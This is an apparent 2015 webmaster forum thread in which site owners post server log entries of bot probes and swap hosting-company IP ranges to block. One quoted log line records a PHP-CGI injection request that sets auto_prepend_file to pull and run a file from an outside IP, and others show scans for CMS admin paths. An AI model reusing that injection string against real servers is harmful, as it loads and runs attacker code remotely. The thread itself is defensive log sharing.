OK, here's one:

103.42.180.136 - - [08/Jul/2015:17:40:29 -0700] "GET /data/admin/allowurl.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 
103.42.180.136 - - [08/Jul/2015:17:40:38 -0700] "GET /uploads/allimg/index.html HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /plus/list.php HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /include/captcha/README.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 

For those who haven't been paying attention, 103 is APNIC's answer to 185. Free lookup says that
103.42.180.0/22
(a) belongs to China and (b) "1 website uses this address."

To block or not to block ... Gee, it's so tough to decide.

It took me a while to figure out that the reason requests #1 and #4 made it as far as a 404 was the .txt extension.

(a) belongs to China and (b) "1 website uses this address."
To block or not to block ... Gee, it's so tough to decide.

Looks like Shenzhen Yi Cloud Network (myhostadmin.cn) is a mixed services company - internet access, mobile network and hosting. That whopping "1 website" may be the only one there. But you know the Chinese... one today, a billion tomorrow!

Those GET requests appear to be the standard type probes usually seen by compromised accounts IMO. But then I'm biased; since I took down my Asia/Pacific blocks, my human traffic almost doubled and the increased revenue from Adsence has more than justified dealing with the occasional script threat from that region. I have other mechanisms in place for that.

sakura.ne.jp
112.78.112.0/20
112.78.112.0 - 112.78.127.255

Knowing our Lucy, I think we can safely assume her question was indeed rhetorical :)

meerfarbig.de
185.44.104.0/22
185.44.104.0 - 185.44.107.255

owned-networks.net
104.244.152.0/21
104.244.152.0 - 104.244.159.255

stormweb.ca
207.112.70.0/24
207.112.70.0 - 207.112.70.255

xmission.com
207.135.128.0/19
207.135.128.0 - 207.135.159.255

XMission uses some sub-nets from WestNet, which I've omitted.
XMISSION-166-70-0-0 166.70.0.0 - 166.70.255.255 166.70.
XMISSION-207-135-128-0 207.135.128.0 - 207.135.159.255 207.135.128.0/19
XMISSION 68.69.160.0 - 68.69.175.255 68.69.160.0/20
XMISSION 2607:FA18:: - 2607:FA18:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF

Thanks Don, had all those :)

Posted since that respective range had changed since the last time did a look-up.

Turhost.com
37.230.104.0/21
37.230.104.0 - 37.230.111.255
109.232.220.0/22
109.232.220.0 - 109.232.223.255

********

worldwidewebhosting.com
108.174.144.0/20
108.174.144.0 - 108.174.159.255

I assume by the name there are more DCs.

worldwidewebhosting.com admin ranges:
173.192.89.192/27
173.192.89.192 - 173.192.89.223

Reside at softlayer.com:
173.192.0.0/15
173.192.0.0 - 173.193.255.255

(Which *could* indicate they're a reseller.)

World Wide Web Hosting
WWWHL-NET-01 108.174.144.0 - 108.174.159.255 108.174.144.0/20
WWWHL-NET-02 162.210.48.0 - 162.210.51.255 162.210.48.0/22

In addition has six subnets within Astute Hosting ranges
ASTUTEHOSTING5 104.255.8.0 - 104.255.11.255 104.255.8.0/22
ASTUTEHOSTING4 104.37.72.0 - 104.37.75.255 104.37.72.0/22
ASTUTEHOSTING6 142.147.82.0 - 142.147.83.255 142.147.82.0/23
ASTUTEHOSTING2 162.213.156.0 - 162.213.159.255 162.213.156.0/22
ASTUTEHOSTING3 162.245.144.0 - 162.245.147.255 162.245.144.0/22
ASTUTEHOSTING 199.167.16.0 - 199.167.23.255 199.167.16.0/21
ASTUTEHOSTING 2607:D500:: - 2607:D500:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF

Everytime I read your IPv6 cut'n paste posts, my brain wants to write:
deny from F

This is a useless thread from the respective of search options!
I. e. Add2net [google.com]

Looking for PHP vulnerabilities via a range I did not have (my last saved accumulation was 2008).
AKA Lunar Pages.
Current ranges [whois.arin.net]

I just love it when I have all the ranges :)

sadecehosting.com
188.132.216.0/21
188.132.216.0 - 188.132.223.255

Not sure how good this is but may be useful. It claims to test IPs for the type of hosting, if any.

dedicatedornot.com

RE: dedicatedornot.com

Might come in handy for those sometimes questionable IPs where little indication is given through the normal sources.Thanks.

Las Vegas NV Datacenter? or Premianet?
Root request only.
No supporting images.

RES-SERVERPOINT-01 173.254.190.8 - 173.254.190.15 173.254.190.8/29 (RagingWire Data 173.254.176.0 - 173.254.191.255 173.254.176.0/20)
PREMIANET 216.108.224.0 - 216.108.239.255 216.108.224.0/20
APH-LAS-NV1 64.235.32.0 - 64.235.63.255 64.235.32.0/19
PREMIANET 72.18.192.0 - 72.18.207.255 72.18.192.0/20

Thanks, had the 216.108.224.0/20 but not the others.

It's my recollection that there was a rather recent discussion on IBM Cloud, however no luck locating.

Anybody have any RIPE ranges on Softlayer?
This AM visitor is from Softlayer, however is used by IBM Cloud, and for a specific RIPE customer.
169.53.149.14 - - [26/Jul/2015:05:59:52 -0600] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp ://159 .122.141.239/i.txt HTTP/1.1" 403 635 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7"

Don't know which ones are RIPE (without squeezing them):

5.10.64.0/18 #SoftLayer 5.10.64.0 - 5.10.127.255
5.153.0.0/18 #SoftLayer 5.153.0.0 - 5.153.63.255
37.58.64.0/18 #SoftLayer 37.58.64.0 - 37.58.127.255
50.22.0.0/15 #SoftLayer 50.22.0.0 - 50.23.255.255
50.97.0.0/16 #SoftLayer 50.97.0.0 - 50.97.255.255
66.228.112.0/20 #SoftLayer 66.228.112.0 - 66.228.127.255
67.228.0.0/16 #SoftLayer 67.228.0.0 - 67.228.255.255
74.86.0.0/16 #Softlayer 74.86.0.0 - 74.86.255.255
75.126.0.0/16 #SoftLayer 75.126.0.0 - 75.126.255.255
104.237.128.0/19 #Linode/Softlayer 104.237.128.0 - 104.237.159.255
108.168.128.0/17 #SoftLayer 108.168.128.0 - 108.168.255.255
119.81.0.0/16 #SoftLayer 119.81.0.0 - 119.81.255.255
158.85.0.0/16 #SoftLayer 158.85.0.0 - 158.85.255.255
159.8.0.0/16 #SoftLayer 159.8.0.0 - 159.8.255.255
159.122.0.0/16 #SoftLayer 159.122.0.0 - 159.122.255.255
159.253.128.0/19 #Softlayer 159.253.128.0 - 159.253.159.255
169.38.0.0/16 #SoftLayer 169.38.0.0 - 169.38.255.255
169.45.0.0/16 #SoftLayer 169.45.0.0 - 169.48.255.255
169.50.0.0/15 #SoftLayer 169.50.0.0 - 169.51.255.255
169.53.0.0/16 #SoftLayer 169.53.0.0 - 169.63.255.255
169.56.0.0/13 #SoftLayer 169.53.0.0 - 169.63.255.255
173.192.0.0/15 #Softlayer 173.192.0.0 - 173.193.255.255
174.36.0.0/15 #Softlayer 174.36.0.0 - 174.37.255.255
174.140.18.0/24 #Softlayer 174.140.18.0 - 174.140.18.255
174.140.29.0/24 #Softlayer 174.140.29.0 - 174.140.29.255
174.140.33.0/24 #Softlayer 174.140.33.0 - 174.140.33.255
174.140.36.0/24 #Softlayer 174.140.36.0 - 174.140.36.255
174.140.51.0/24 #Softlayer 174.140.51.0 - 174.140.51.255
192.155.192.0/18 #SoftLayer 192.155.192.0 - 192.155.255.255
192.255.0.0/18 #SoftLayer 192.255.0.0 - 192.255.63.255
198.23.64.0/18 #SoftLayer 198.23.64.0 - 198.23.127.255
208.43.0.0/16 #SoftLayer 208.43.0.0 - 208.43.255.255
208.101.0.0/18 #SoftLayer 208.101.0.0 - 208.101.63.255

Many thanks

Softlayer RIPE (NL) (that I have)...

5.10.64.0 - 5.10.127.255
5.153.0.0 - 5.153.63.255
37.58.64.0 - 37.58.127.255
159.8.0.0 - 159.8.255.255
159.253.128.0 - 159.253.159.255

The above ranges 174.140... combine to...

174.140.0.0 - 174.140.63.255
174.140.0.0/18
Cyber Fusion Systems

@dstiles thanks for the info. They formerly were assigned to SoftLayer. I have them cut-up like that mostly because of the mobile app traffic coming through clouds, which I merely cut'n pasted quickly for Don.

Probably time for another mass validation check of all the ranges I manipulate. Did one last year and found approx 20 had changed ownership, but remained same category and a few that were no longer used for anything related to the former company.

Update/Correction for BTN server
In case I (or others) missed an update, a CIDR given here last Sept (!) just showed up, but my whois utility shows a different CIDR which seems to be the correct one. This is for "Beyond The Network" range:

BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/16

which was posted last Sept. here, my lookup shows:

BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/15

which looks right since the range does not end with 209.8.255.255 but covers all of 209.9. too.

I had it as /15 as well. Thanks for the head-up. Always good to give things a second look :)

Got hit from a new Sakura range. Scraped HTML & image files:

160.16.119.123 - - [10/Aug/2015:03:07:43 -0700] "GET /example.html HTTP/1.1" 200 15708 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"

Which brings my Sakura list to:

49.212.0.0/16
49.212.0.0 - 49.212.255.255

59.106.0.0/16
59.106.0.0 - 59.106.255.255

112.78.112.0/20
112.78.112.0 - 112.78.127.255

160.16.0.0/16 (new)
160.16.0.0 - 160.16.255.255

182.48.0.0/18
182.48.0.0 - 182.48.63.255

219.94.128.0/17
219.94.128.0 - 219.94.255.255

Even after I blocked the bot ^above^ it continues eating thousands of 403s, going on 3 hours now.